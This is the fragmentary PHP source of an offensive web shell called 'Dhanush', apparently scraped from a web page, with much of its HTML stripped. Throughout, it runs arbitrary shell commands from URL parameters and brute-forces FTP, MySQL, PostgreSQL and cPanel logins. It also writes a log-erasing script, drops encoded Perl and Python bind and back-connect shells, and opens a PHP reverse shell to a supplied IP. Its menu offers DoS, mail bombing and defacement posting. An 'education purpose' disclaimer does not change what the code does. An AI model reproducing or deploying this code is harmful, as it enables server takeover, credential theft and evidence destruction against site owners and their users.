| Safe mode bypass |
|
Using copy() function
|
Using File contents function
|
|
Using Stream contents function
|
Using Curl() function
|
|
Bypass using include()
|
Using id() function
|
|
Using tempnam() function
|
Using symlink() function
|
|
Using Bypass function
|
PHP CURL NOT EXIST";
}
?>
Zone-h Poster
D h a n u s h
[--==Coded By Arjun==--]
- -- -
-- -- --
-- --
--- ---
------
----
----
------
-------
--- --
-- ---
-- -----
--- --- ---
--- --- ---
-- --------- --
-- ------- --
-- ---- --
-- --- --
-- -- --
--- --- -- ---
------ ------
---- ----
This script is coded by an Indian Ethical Hacker.
This script is only coded for education purpose or testing on your own server. The developer of the script is not responsible for any damage or misuse of it.GREETZ To All Indian Hackers
| जय महाकाल | | जय हिन्द |
">
";
ob_start();
eval("phpinfo();");
$b = ob_get_contents();
ob_end_clean();
$a = strpos($b,"")+6; // yeah baby,, your body is wonderland ;-)
$z = strpos($b,"");
$s_result = "
".substr($b,$a,$z-$a)."
";
echo $s_result;
}
else if(isset($_GET['execute']))
{
$comm = $_GET['execute'];
chdir($_GET['executepath']);
$check = shell_exec($comm);
echo "
";
?>
Logs Cleared";
}
} else
{
if($openp = fopen("/tmp/logseraser.pl", 'w'))
{
fwrite($openp, $erase)or die("Error");
fclose($openp);
$aidx = passthru("perl logseraser.pl linux");
unlink("logseraser.pl");
echo "
Logs Cleared";
}
}
}
else
{
$check = shell_exec($_GET['mycmd']);
echo "
";
}
}
else if(isset($_GET['prototype']))
{
echo '
Results
Type: '.htmlspecialchars($_GET['prototype']).'
Server: '.htmlspecialchars($_GET['serverport']).'
';
if( $_GET['prototype'] == 'ftp' )
{
function BruteFun($ip,$port,$login,$pass)
{
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
}
elseif( $_GET['prototype'] == 'mysql' )
{
function BruteFun($ip,$port,$login,$pass)
{
$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
@mysql_close($res);
return $res;
}
}
elseif( $_GET['prototype'] == 'pgsql' )
{
function BruteFun($ip,$port,$login,$pass)
{
$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_GET['server']);
if($_GET['type'] == 1)
{
$temp = @file('/etc/passwd');
if( is_array($temp))
foreach($temp as $line)
{
$line = explode(":", $line);
++$attempts;
if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
{
$success++;
echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
';
}
if(@$_GET['reverse'])
{
$tmp = "";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
{
$success++;
echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp);
}
}
}
}
elseif($_GET['type'] == 2)
{
$temp = @file($_GET['dict']);
if( is_array($temp) )
foreach($temp as $line)
{
$line = trim($line);
++$attempts;
if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
{
$success++;
echo ''.htmlspecialchars($_GET['login']).':'.htmlspecialchars($line).'
';
}
}
}
echo "Attempts: $attempts Success: $success
";
}
// Execute Query
else if(isset($_GET["executeit"]))
{
if(isset($_GET['username']) && isset($_GET['server']))
{
$dbserver = $_GET['server'];
$dbuser = $_GET['username'];
$dbpass = $_GET['password'];
if(mysql_connect($dbserver,$dbuser,$dbpass))
{
setcookie("dbserver", $dbserver);
setcookie("dbuser", $dbuser);
setcookie("dbpass", $dbpass);
listdatabase();
}
else
echo "cannotconnect";
}
}
else if(isset($_GET['action']) && isset($_GET['dbname']))
{
if($_GET['action'] == "createDB")
{
$dbname = $_GET['dbname'];
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
mysql_query("create database $dbname",$mysqlHandle);
listdatabase();
}
if($_GET['action'] == 'dropDB')
{
$dbname = $_GET['dbname'];
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
mysql_query("drop database $dbname",$mysqlHandle);
mysql_close($mysqlHandle);
listdatabase();
}
if($_GET['action'] == 'listTables')
{
listtable();
}
// Create Tables
if($_GET['action'] == "createtable")
{
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
mysql_query("CREATE TABLE $tablename ( no INT )");
listtable();
}
// Drop Tables
if($_GET['action'] == "dropTable")
{
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
mysql_query("drop table $tablename");
listtable();
}
// Empty Tables
if($_GET['action'] == "empty")
{
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
mysql_query("delete from $tablename");
listtable();
}
// Empty Tables
if($_GET['action'] == "dropField")
{
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
$fieldname = $_GET['fieldname'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr , $mysqlHandle );
listtable();
}
if($_GET['action'] == 'viewdb')
{
listdatabase();
}
// View Table Schema
if($_GET['action'] == "viewSchema")
{
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
echo "
";
$pResult = mysql_query( "SHOW fields FROM $tablename" );
$num = mysql_num_rows( $pResult );
echo "
";
echo "| Field | Type | Null | Key | ";
for( $i = 0; $i < $num; $i++ )
{
$field = mysql_fetch_array( $pResult );
echo "\n";
echo "| ".$field["Field"]." | \n";
echo "".$field["Type"]." | \n";
echo "".$field["Null"]." | \n";
echo "".$field["Key"]." | \n";
echo "".$field["Default"]." | \n";
echo "".$field["Extra"]." | \n";
$fieldname = $field["Field"];
echo "Drop | \n";
echo "
\n";
}
echo "
";
echo "
";
}
// Execute Query
if($_GET['action'] == "executequery")
{
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$result = mysql_query($_GET['executemyquery']);
// results
echo "\r\n". strtoupper($_GET['executemyquery']) . "
\r\n
\r\n";
$count = 0;
while ($row = mysql_fetch_assoc($result))
{
echo "\r\n";
if ($count==0) // list column names
{
echo "
\r\n";
while($key = key($row))
{
echo "| " . $key . " | \r\n";
next($row);
}
echo "
\r\n";
}
foreach($row as $r) // list content of column names
{
if ($r=='') $r = 'NULL';
echo "" . $r . " | \r\n";
}
echo "\r\n";
$count++;
}
echo "
\n\r
" . $count . " rows returned.\r\n";
echo "
";
}
// View Table Data
if($_GET['action'] == "viewdata")
{
global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
echo "
";
?>
Data in Table";
if( $tablename != "" )
echo "
$dbname > $tablename";
else
echo "
$dbname";
$queryStr = "";
$pag = 0;
$queryStr = stripslashes( $queryStr );
if( $queryStr == "" )
{
if(isset($_REQUEST['page']))
{
$res = mysql_query("select * from $tablename");
$getres = mysql_num_rows($res);
$coun = ceil($getres/30);
if($_REQUEST['page'] != 1)
$pag = $_REQUEST['page'] * 30;
else
$pag = $_REQUEST['page'] * 30;
$queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
$sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
$arrcount = 1;
$arrdata[$arrcount] = 0;
while($row = mysql_fetch_array($sql))
{
$arrdata[$arrcount] = $row[$rowid];
$arrcount++;
}
}
else
{
$queryStr = "SELECT * FROM $tablename LIMIT 0,30";
$sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
$arrcount = 1;
$arrdata[$arrcount] = 0;
while($row = mysql_fetch_array($sql))
{
$arrdata[$arrcount] = $row[$rowid];
$arrcount++;
}
}
if( $orderby != "" )
$queryStr .= " ORDER BY $orderby";
echo "
Schema\n";
}
$pResult = mysql_query($queryStr );
$fieldt = mysql_fetch_field($pResult);
$tablename = $fieldt->table;
$errMsg = mysql_error();
$GLOBALS[queryStr] = $queryStr;
if( $pResult == false )
{
echoQueryResult();
return;
}
if( $pResult == 1 )
{
$errMsg = "Success";
echoQueryResult();
return;
}
echo "
\n";
$row = mysql_num_rows( $pResult );
$col = mysql_num_fields( $pResult );
if( $row == 0 )
{
echo "
No Data Exist!";
return;
}
if( $rowperpage == "" ) $rowperpage = 30;
if( $page == "" ) $page = 0;
else $page--;
mysql_data_seek( $pResult, $page * $rowperpage );
echo "
\n";
echo "\n";
for( $i = 0; $i < $col; $i++ )
{
$field = mysql_fetch_field( $pResult, $i );
echo "| ";
if($action == "viewdata")
echo "".$field->name."\n";
else
echo $field->name."\n";
echo " | \n";
}
echo "Action | \n";
echo "
\n";
$num=1;
$acount = 1;
for( $i = 0; $i < $rowperpage; $i++ )
{
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
echo "\n";
$key = "";
for( $j = 0; $j < $col; $j++ )
{
$data = $rowArray[$j];
$field = mysql_fetch_field( $pResult, $j );
if( $field->primary_key == 1 )
$key .= "&" . $field->name . "=" . $data;
if( strlen( $data ) > 30 )
$data = substr( $data, 0, 30 ) . "...";
$data = htmlspecialchars( $data );
echo "| \n";
echo "$data\n";
echo " | \n";
}
if(!is_numeric($arrdata[$acount]))
echo "No Key | \n";
else
{
echo "Edit | \n";
echo "Delete | \n";
$acount++;
}
}
echo "
\n";
echo "
";
if($arrcount > 30)
{
$res = mysql_query("select * from $tablename");
$getres = mysql_num_rows($res);
$coun = ceil($getres/30);
echo "
";
echo "
";
}
}
// Delete Table Data
if($_GET['action'] == "deleteData")
{
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
$row = mysql_fetch_array($sql);
$row = $row['COLUMN_NAME'];
$rowid = $_GET[$row];
mysql_query("delete from $tablename where $row = '$rowid'");
listtable();
}
// Edit Table Data
if($_GET['action'] == "editData")
{
global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_GET['dbname'];
$tablename = $_GET['tablename'];
echo "
";
?>
\n";
}
}
// Edit Submit Table Data
else if($_REQUEST['action'] == "editsubmitData")
{
$dbserver = $_COOKIE["dbserver"];
$dbuser = $_COOKIE["dbuser"];
$dbpass = $_COOKIE["dbpass"];
$dbname = $_POST['dbname'];
$tablename = $_POST['tablename'];
$mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
$row = mysql_fetch_array($sql);
$row = $row['COLUMN_NAME'];
$rowid = $_POST[$row];
$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
$num = mysql_num_rows( $pResult );
$rowcount = $num;
$pResultLen = mysql_list_fields( $dbname, $tablename );
for( $i = 0; $i < $num; $i++ )
{
$field = mysql_fetch_array( $pResult );
$fieldname = $field["Field"];
$arrdata = $_REQUEST[$fieldname];
$str .= " " . $fieldname . " = '" . $arrdata . "'";
$rowcount--;
if($rowcount != 0)
$str .= ",";
}
$str = "update $tablename set" . $str . " where $row=$rowid";
mysql_query($str);
?>
';
foreach ($actbox as $myv)
$myv = explode(",",$myv);
foreach ($myv as $v)
{
if(is_file($v))
{
if(unlink($v))
echo "
File $v Deleted Successfully";
else
echo "
Cannot Delete File $v";
}
else if(is_dir($v))
{
rrmdir($v);
}
}
echo '
';
}
else if($_POST['choice'] == "chmod")
{ ?>
';
if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
{
$actbox = $_POST["actbox"];
foreach ($actbox as $myv)
$myv = explode(",",$myv);
foreach ($myv as $v)
{
if(is_file($v) || is_dir($v))
{
$perms = 0;
for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
$perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
echo "
";
if(@chmod($v,$perms))
echo "File $v Permissions Changed Successfully
";
else
echo "Cannot Change $v File Permissions
";
echo "
";
}
}
}
}
else if($_POST['choice'] == "compre")
{
echo '
';
$actbox = $_POST["actbox"];
foreach ($actbox as $myv)
$myv = explode(",",$myv);
foreach ($myv as $v)
{
if(is_file($v))
{
$zip = new ZipArchive();
$filename= basename($v) . '.zip';
if(($zip->open($filename, ZipArchive::CREATE))!==true)
{ echo '
Error: Unable to create zip file for $v';}
else {echo "
File $v Compressed successfully";}
$zip->addFile(basename($v));
$zip->close();
}
else if(is_dir($v))
{
if($os == "Linux")
{
$filename= basename($v);
execmd("tar --create --recursion --file=$filename.tar $v");
echo "
File $v Compressed successfully as $v.tar";
}
else
echo "
Cannot compress directory
";
}
}
echo '
';
}
else if($_POST['choice'] == "uncompre")
{
echo '
';
$actbox = $_POST["actbox"];
foreach ($actbox as $myv)
$myv = explode(",",$myv);
foreach ($myv as $v)
{
if(is_file($v) || is_dir($v))
{
$zip = new ZipArchive;
$filename= basename($v);
$res = $zip->open($filename);
if ($res === TRUE)
{
$pieces = explode(".",$filename);
$zip->extractTo($pieces[0]);
$zip->close();
echo '
File '.$v.' Unzipped successfully';
} else
echo "
Error: Unable to Unzip file $v";
}
}
echo '
';
}
}
else if(isset($_GET['sitename']))
{
$sitename = str_replace("http://","",$_GET['sitename']);
$sitename = str_replace("http://www.","",$sitename);
$sitename = str_replace("www.","",$sitename);
$show = myexe("ls -la /etc/valiases/".$sitename);
if(!empty($show))
echo $show;
else
echo "Cannot get the username";
}
else if(isset($_GET['mydata']))
{
listdatabase();
}
else if(isset($_GET['home']))
{
mainfun($_GET['home']);
}
else if(isset($_GET['dir']))
{
mainfun($_GET['myfilepath']);
}
else if(isset($_GET['mydirpath']))
{
echo is_writable($_GET['mydirpath'])?"
< writable >":"< not writable >";
}
else
{
?>
Dhanush : By Arjun
| System Info : |
Server Port : |
Software Info |
| Uid : |
2)
{
flush();
$count++;
}
}
}
?>Websites : | 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
continue;
$count++;
}
?>Websites : |
Download It |
| Free Space : of |
Safe Mode : |
Server IP : |
Your IP : |
| View Directories : |
Current Directory :
".htmlspecialchars($b).$directorysperator.'';
$i++;
}
?>
[Home] |
Disable functions : |
'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
$m2 = array('SQL'=>'database','Sub-Domain Creator'=>'subdomain','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
echo "
";
$menu = '';
foreach($m1 as $k => $v)
$menu .= "| [".$k."] | ";
echo $menu;
echo "
";?>
SecFilterEngine Off
SecFilterScanPOST Off
\n\r");
$file_pointer = fopen("ini.php", "w+");
fwrite($file_pointer, "");
$file_pointer = fopen("php.ini", "w+");
fwrite($file_pointer, "safe_mode = Off");
fclose($file_pointer);
}
if(isset($_POST['cpanelattack']))
{
if(!empty($_POST['username']) && !empty($_POST['password']))
{
$userlist=explode("\n",$_POST['username']);
$passlist=explode("\n",$_POST['password']);
$e = explode("\n",$_POST['username']);
foreach($e as $value)
{
$k = explode(":",$value);
$username .= $k['0']." ";
}
$a1 = explode(" ",$username);
$a2 = explode("\n",$_POST['password']);
$id2 = count($a2);
$ok = 0;
foreach($a1 as $user)
{
if($user !== '')
{
$user=trim($user);
for($i=0;$i<=$id2;$i++)
{
$pass = trim($a2[$i]);
if(@mysql_connect('localhost',$user,$pass))
{
echo "User is (
$user) Password is (
$pass)
";
$ok++;
}
}
}
}
echo "
You Found $ok";
}
else
$bdmessage = "
Enter Username & Password List";
}
elseif(isset($_GET['style']))
{
setcookie('style',$_GET['style']);
header("location:$self");
}
else if(isset($_GET['info']))
{
$bdmessage = "
".nl2br(shell_exec("whois ".$_GET['info']))."
";
}
else if(isset($_POST['u']))
{
$path = $_REQUEST['path'];
if(is_dir($path))
{
$setuploadvalue = 0;
$uploadedFilePath = $_FILES['uploadfile']['name'];
$tempName = $_FILES['uploadfile']['tmp_name'];
if($os == "Windows")
$uploadPath = $path . $directorysperator . $uploadedFilePath;
else if($os == "Linux")
$uploadPath = $path . $directorysperator . $uploadedFilePath;
if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
$bdmessage = "";
else
$bdmessage = "";
}
?>$out\n".execmd("ps aux | grep bp.pl")."";
}
else
{
@$fh=fopen("/tmp/bp.pl","w");
@fwrite($fh,gzinflate(base64_decode($bind_port_p)));
@fclose($fh);
execmd("chmod 0755 ".getcwd()."/bp.pl");
execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
$bdmessage = "$out\n".execmd("ps aux | grep bp.pl")."";
}
}
}
}
else if(isset($_POST['backconnect']))
{
if($_POST['ip'] != "" && $_POST['port'] != "")
{ ?>Trying to connect...";
execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program";
}
else
{
@$fh=fopen("/tmp/bc.pl","w");
@fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
@fclose($fh);
$bdmessage = "Trying to connect...";
execmd("perl /tmp/bc.pl $host $port &",$disable);
if(!@unlink("/tmp/bc.pl"))
echo "Warning: Failed to delete reverse-connection program
";
}
}
else if($_POST["lang"] == "python")
{
if(is_writable("."))
{
$w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
if($w_file)
{
@fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
@fclose($w_file);
chmod(getcwd().'/bc.py', 0777);
}
execmd("python ".getcwd()."/bc.py $host $port &",$disable);
$bdmessage = "Trying to connect...";
if(!@unlink(getcwd()."/bc.py"))
echo "Warning: Failed to delete reverse-connection program
";
}
else
{
$w_file=@fopen("/tmp/bc.py","w");
if($w_file)
{
@fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
@fclose($w_file);
chmod('/tmp/bc.py', 0777);
}
execmd("python /tmp/bc.py $host $port &",$disable);
$bdmessage = "Trying to connect...";
if(!@unlink("/tmp/bc.py"))
echo "Warning: Failed to delete reverse-connection program
";
}
}
else if($_POST["lang"] == "php")
{
$bdmessage = "Trying to connect...";
$ip = $_POST['ip'];
$port=$_POST['port'];
$sockfd=fsockopen($ip , $port , $errno, $errstr );
if($errno != 0)
{
$bdmessage = "$errno : $errstr";
}
else if (!$sockfd)
{
$result = "Fatal : An unexpected error was occured when trying to connect!
";
}
else
{
fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
$pwd = exec_all("pwd");
$sysinfo = exec_all("uname -a");
$id = exec_all("id");
$len = 1337;
fputs($sockfd ,$sysinfo . "\n" );
fputs($sockfd ,$pwd . "\n" );
fputs($sockfd ,$id ."\n\n" );
fputs($sockfd ,$dateAndTime."\n\n" );
while(!feof($sockfd))
{
$cmdPrompt ="(dhanush)[$]> ";
fputs ($sockfd , $cmdPrompt );
$command= fgets($sockfd, $len);
fputs($sockfd , "\n" . exec_all($command) . "\n\n");
}
fclose($sockfd);
}
}
}
}
else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
{
$temp = "";
for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
{
$uid = @posix_getpwuid($_GET['val1']);
if ($uid)
$temp .= join(':',$uid)."\n";
}
echo '
';
paramexe('Users', $temp);
}
else if(isset($_GET['download']))
{
download();
}
else
{
?>< writable >":"< not writable >";
?>
|
Create File :
|
| Execute : |
Create Directory : |
| Read File |
Read Directory |
| Get Exploit
|
|